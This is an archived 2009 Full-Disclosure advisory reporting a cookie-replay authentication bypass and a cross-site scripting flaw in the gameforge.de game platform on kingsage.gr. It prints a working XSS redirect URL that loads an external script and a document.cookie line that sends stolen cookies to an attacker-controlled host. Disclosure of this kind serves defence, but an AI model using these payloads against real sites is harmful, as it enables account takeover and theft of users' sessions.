lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <938f06e60909300028q612df2d4n35f9db011d5d89cf@mail.gmail.com>
Date: Wed, 30 Sep 2009 10:28:09 +0300
From: mestre rigel <mestre.rigel@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: gameforge.de gaming platform (validated for:
	kingsage.gr) authentication bypass (using hashed values) and
	cross site scripting

Dear all,

I'd like to inform you about a security vulnerability in gameforge.de gaming
platform.

This vulnerability is validated only for kingsage.gr (versions 0.1.17,
0.1.18 and 0.1.19 - latest) but might affect all games developed under the
specific gaming platform (e.g.: ikariam, gladiatus, katsuro, battleknight,
bitefight, etc.)

=========================== Authentication bypass using hashed values
====================

After the initial login into the game all following plain HTTP GET/POST
requests are similar to this:

GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml,
application/x-silverlight, */*
Referer:
http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR
1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698;
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user;
game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive

which, among others, include three critical elements:

village=24482 [The village number - can be found for any user from within
the game]
game_user=some.user [The users' username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the users'
password]

Taking into account that this traffic, which is plain HTTP can be sniffed
and that the games' cookies do not expire, a malicious user - by obtaining
another users' cookies *once* - can bypass authentication and access the
application/game as another user *at any time*.

The steps are the following.

1. The malicious user uses his/her personal account to enter the game
2. The malicious user modifies any following request by deleting
SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTS only the
village, game_user and game_pass values that he/she has obtained.

Using this approach a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.

=========================== Vulnerability Impact (Correlated with Cross Site
Scripting) =============

The existence of Cross Site Scripting at the gaming platform raises the
impact of the vulnerability:

As an example if malicious user [A] sends to user [B] a message like this:

[url]
http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]<http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E%5B/url%5D>

*From withing the games' messaging functionality*

User [A] is able to inject/include malicious javascript code [<SCRIPT
SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie -
which includes all sensitive information for the attack described in the
first part - of user [B]

(This can be accomplished using e.g.: document.location='
http://user_a_controlled_site?cookie='+document.cookie<http://user_a_controlled_site/?cookie=%27+document.cookie>;
in the maliciouscode.js)

Kind regards,

mestre.rigel

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ